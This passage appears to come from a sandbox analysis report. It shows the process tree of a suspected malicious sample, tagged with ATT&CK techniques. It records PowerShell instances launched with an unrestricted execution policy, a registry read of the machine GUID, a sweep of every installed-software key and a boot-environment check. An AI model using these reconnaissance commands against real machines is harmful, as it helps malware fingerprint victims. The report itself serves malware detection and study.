C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -3⤵
- Command and Scripting Interpreter: PowerShell
PID:3544
-
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -3⤵
- Command and Scripting Interpreter: PowerShell
PID:560
-
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -3⤵
- Command and Scripting Interpreter: PowerShell
PID:1744
-
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -3⤵
- Command and Scripting Interpreter: PowerShell
PID:4528
-
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -3⤵
- Command and Scripting Interpreter: PowerShell
PID:5008
-
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -3⤵
- Command and Scripting Interpreter: PowerShell
PID:4572
-
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -3⤵
- Command and Scripting Interpreter: PowerShell
PID:3672
-
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -3⤵
- Command and Scripting Interpreter: PowerShell
PID:2076
-
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -3⤵
- Command and Scripting Interpreter: PowerShell
PID:2948
-
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -3⤵
- Command and Scripting Interpreter: PowerShell
PID:4008
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "findstr /C:"Detected boot environment" "%windir%\Panther\setupact.log""3⤵PID:3360
-
C:\Windows\system32\findstr.exefindstr /C:"Detected boot environment" "C:\Windows\Panther\setupact.log"4⤵PID:5360
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Cryptography" /v MachineGuid"3⤵PID:5712
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Cryptography" /v MachineGuid4⤵PID:3696
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""3⤵PID:5780
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"4⤵PID:2896
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "echo %COMPUTERNAME%.%USERDNSDOMAIN%"3⤵PID:2572
-
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -3⤵
- Command and Scripting Interpreter: PowerShell
PID:2820
-
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -3⤵
- Command and Scripting Interpreter: PowerShell
PID:4484
-
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -3⤵
- Command and Scripting Interpreter: PowerShell
PID:4080
-
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -3⤵
- Command and Scripting Interpreter: PowerShell
PID:5580
-
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -3⤵
- Command and Scripting Interpreter: PowerShell
PID:5188
-
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -3⤵
- Command and Scripting Interpreter: PowerShell
PID:6136 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:3140
-
-
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -3⤵
- Command and Scripting Interpreter: PowerShell
PID:5816
-
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -3⤵
- Command and Scripting Interpreter: PowerShell
PID:5824
-
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -3⤵
- Command and Scripting Interpreter: PowerShell
PID:5812
-
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -3⤵
- Command and Scripting Interpreter: PowerShell
PID:4512 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4576
-
-
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -3⤵
- Command and Scripting Interpreter: PowerShell
PID:1916
-
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -3⤵
- Command and Scripting Interpreter: PowerShell
PID:3616
-
-
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -NoProfile -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -3⤵
- Command and Scripting Interpreter: PowerShell
PID:5132
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""3⤵PID:6036
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"4⤵PID:1792
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip""3⤵PID:2848
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip"4⤵PID:1208
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "findstr /C:"Detected boot environment" "%windir%\Panther\setupact.log""3⤵PID:5804
-
C:\Windows\system32\findstr.exefindstr /C:"Detected boot environment" "C:\Windows\Panther\setupact.log"4⤵PID:4540
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook""3⤵PID:5184
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook"4⤵PID:5412
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager""3⤵PID:1952
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager"4⤵PID:2948
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx""3⤵PID:5228
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx"4⤵PID:5124
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime""3⤵PID:6048
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime"4⤵PID:4896
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore""3⤵PID:5852
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:6036
-
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore"4⤵PID:5584
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40""3⤵PID:4804
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40"4⤵PID:1220
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data""3⤵PID:6020
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data"4⤵PID:2952
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX""3⤵PID:5324
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX"4⤵PID:3276
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData""3⤵PID:5276
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData"4⤵PID:2616
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack""3⤵PID:4572
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack"4⤵PID:4044
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 135.0 (x64 en-US)""3⤵PID:5172
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 135.0 (x64 en-US)"4⤵PID:5860
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService""3⤵PID:3044
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService"4⤵PID:5424
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2""3⤵PID:5212
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2"4⤵PID:5372
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\mspaint-b330ad9e-f80b-4c96-9949-4b4228be9a6e""3⤵PID:5756
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\mspaint-b330ad9e-f80b-4c96-9949-4b4228be9a6e"4⤵PID:5904
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\mstsc-4b0a31aa-df6a-4307-9b47-d5cc50009643""3⤵PID:5448
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\mstsc-4b0a31aa-df6a-4307-9b47-d5cc50009643"4⤵PID:2276
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us""3⤵PID:3372
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us"4⤵PID:5196
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent""3⤵PID:5336
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent"4⤵PID:852
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SnippingTool-ee6eb196-db28-4d99-816d-fa9a63b4a377""3⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:5728 -
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SnippingTool-ee6eb196-db28-4d99-816d-fa9a63b4a377"4⤵
- System Network Configuration Discovery: Internet Connection Discovery
PID:4024
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player""3⤵PID:5416
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player"4⤵PID:1012
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC""3⤵PID:6040
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC"4⤵PID:5768
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B2627D-8443-41C0-97F0-9F72AC2FD6A0}""3⤵PID:5640
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{01B2627D-8443-41C0-97F0-9F72AC2FD6A0}"4⤵PID:5764
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{0A13A71E-135D-4025-BD15-1511BDD791DB}""3⤵PID:1208
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{0A13A71E-135D-4025-BD15-1511BDD791DB}"4⤵PID:5608
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1B690A4C-381A-40D4-BA4A-3F8ACD5CE797}""3⤵PID:5084
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1B690A4C-381A-40D4-BA4A-3F8ACD5CE797}"4⤵PID:5912
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}""3⤵PID:6080
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}"4⤵PID:5300
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{2BB73336-4F69-4141-9797-E9BD6FE3980A}""3⤵PID:3024
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{2BB73336-4F69-4141-9797-E9BD6FE3980A}"4⤵PID:4592
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}""3⤵PID:4292
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}"4⤵PID:2880
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A96B93E-763F-41E7-85C7-1F3CCC37EF27}""3⤵PID:5944
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A96B93E-763F-41E7-85C7-1F3CCC37EF27}"4⤵PID:5260
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}""3⤵PID:224
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}"4⤵PID:1572
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}""3⤵PID:6056
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}"4⤵PID:5952
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}""3⤵PID:4372
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}"4⤵PID:5164
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}""3⤵PID:5256
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}"4⤵PID:5276
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}""3⤵PID:2052
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}"4⤵PID:6060
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7447A794-FA2E-42BE-BA9A-5FCBD54C5DF3}""3⤵PID:1408
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{7447A794-FA2E-42BE-BA9A-5FCBD54C5DF3}"4⤵PID:5144
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{77924AE4-039E-4CA4-87B4-2F64180381F0}""3⤵PID:5976
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{77924AE4-039E-4CA4-87B4-2F64180381F0}"4⤵PID:5968
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{79043ED0-7ED1-4227-A5E5-04C5594D21F7}""3⤵PID:6128
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{79043ED0-7ED1-4227-A5E5-04C5594D21F7}"4⤵PID:6072
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}""3⤵PID:4156
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}"4⤵PID:5588
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}""3⤵PID:5496
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}"4⤵PID:832
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}""3⤵PID:5596
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:4484
-
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}"4⤵PID:560
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9F51D16B-42E8-4A4A-8228-75045541A2AE}""3⤵PID:5688
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:3360
-
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{9F51D16B-42E8-4A4A-8228-75045541A2AE}"4⤵PID:2820
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BCC2FB07-8CF0-4542-B10C-61BCEF04AFF2}""3⤵PID:5420
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{BCC2FB07-8CF0-4542-B10C-61BCEF04AFF2}"4⤵PID:5528
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7B73281-AB0A-4DAD-A09F-5C30D40679AC}""3⤵PID:5540
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7B73281-AB0A-4DAD-A09F-5C30D40679AC}"4⤵PID:5336
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}""3⤵PID:1228
-
C:\Windows\system32\reg.exeC:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}"4⤵PID:5772
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CE4D7AE0-FCBA-486F-A58F-DBA3626FBE4B}""3⤵PID:5180
-
